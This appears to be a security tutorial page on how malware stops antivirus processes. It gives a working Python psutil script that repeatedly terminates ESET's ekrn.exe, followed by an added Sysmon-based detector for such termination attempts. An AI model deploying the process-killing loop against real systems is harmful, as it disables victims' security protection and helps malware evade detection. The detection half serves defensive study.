🍫How Malware Authors Terminate Antivirus Processes at Runtime

Explanation

  1. Import Libraries:

    • psutil for process management.

    • time for adding delays.

  2. Define terminate_process_by_name Function:

    • Iterates over all running processes and checks whether each process name matches ekrn.exe (case-insensitively).

    • Terminates the process if a match is found.

    • Handles exceptions if the process no longer exists or access is denied.

    • Returns True if the process was found and terminated; otherwise, False.

  3. Main Block:

    • Sets the process name to ekrn.exe.

    • Continuously checks for the process every 10 seconds.

    • Prints status messages indicating whether the process was found and terminated.

  4. Loop and Delay:

    • The while True loop ensures the script keeps running and checking for the process.

    • time.sleep(10) introduces a delay of 10 seconds between checks to avoid excessive CPU usage.

import psutil
import time

def terminate_process_by_name(process_name):
    """Terminate the first running process whose name matches process_name."""
    for process in psutil.process_iter(['name']):
        # info['name'] can be None for processes the caller is not allowed to query
        name = process.info['name'] or ''
        if name.lower() == process_name.lower():
            try:
                process.terminate()
                print(f"Terminated process: {name} (PID: {process.pid})")
                return True
            except psutil.NoSuchProcess:
                print(f"Process {name} (PID: {process.pid}) no longer exists")
            except psutil.AccessDenied:
                # A self-protected antivirus service normally ends up here
                print(f"Access denied to terminate process: {name} (PID: {process.pid})")
    return False

if __name__ == "__main__":
    process_name = 'ekrn.exe'
    
    while True:
        found = terminate_process_by_name(process_name)
        if found:
            print(f"Process {process_name} was found and terminated.")
        else:
            print(f"Process {process_name} not found.")
        
        # Wait for 10 seconds before checking again
        time.sleep(10)
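Added example, not part of the original page: the defender's view of the technique above. On Windows, psutil's terminate() calls TerminateProcess, which requires a handle opened with the PROCESS_TERMINATE right (0x0001); Sysmon Event ID 10 (ProcessAccess) records the source image, target image and GrantedAccess mask, so the attempt is logged even when the antivirus self-protection makes it fail with AccessDenied. The detector below runs over constructed Sysmon-style records; the protected-process list, the allow-list and the "Key=Value|Key=Value" record format are assumptions for this example.

```python
PROCESS_TERMINATE = 0x0001  # Win32 access right needed by TerminateProcess

# Assumed list for illustration; extend with the AV services in your estate.
PROTECTED_AV_PROCESSES = {"ekrn.exe", "msmpeng.exe"}

def parse_event(line):
    """Parse one constructed 'Key=Value|Key=Value' Sysmon-style record."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))

def detect_terminate_handles(lines, allowed_sources=()):
    """Return (source, target, access) tuples for Sysmon Event ID 10 records
    where a handle including PROCESS_TERMINATE was opened on a protected AV
    process by a source image that is not on the allow-list."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "10":
            continue  # only ProcessAccess events carry GrantedAccess
        target = ev["TargetImage"].rsplit("\\", 1)[-1].lower()
        source = ev["SourceImage"].rsplit("\\", 1)[-1].lower()
        access = int(ev["GrantedAccess"], 16)
        if (target in PROTECTED_AV_PROCESSES
                and access & PROCESS_TERMINATE
                and source not in allowed_sources):
            alerts.append((ev["SourceImage"], ev["TargetImage"], access))
    return alerts

# Constructed sample telemetry, not captured from a real host.
SAMPLE_EVENTS = [
    "EventID=10|SourceImage=C:\\Users\\u\\python.exe|TargetImage=C:\\Program Files\\ESET\\ekrn.exe|GrantedAccess=0x1001",
    "EventID=10|SourceImage=C:\\Windows\\System32\\svchost.exe|TargetImage=C:\\Program Files\\ESET\\ekrn.exe|GrantedAccess=0x1000",
    "EventID=10|SourceImage=C:\\Users\\u\\python.exe|TargetImage=C:\\Windows\\notepad.exe|GrantedAccess=0x1001",
    "EventID=5|Image=C:\\Program Files\\ESET\\ekrn.exe",
]

if __name__ == "__main__":
    for source, target, access in detect_terminate_handles(SAMPLE_EVENTS):
        print(f"ALERT: {source} opened {target} with 0x{access:04x} (includes PROCESS_TERMINATE)")
```

The 0x1000 record (PROCESS_QUERY_LIMITED_INFORMATION only) is what the name lookup in process_iter produces and is not flagged; only the handle that includes the terminate bit on the AV service raises an alert.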
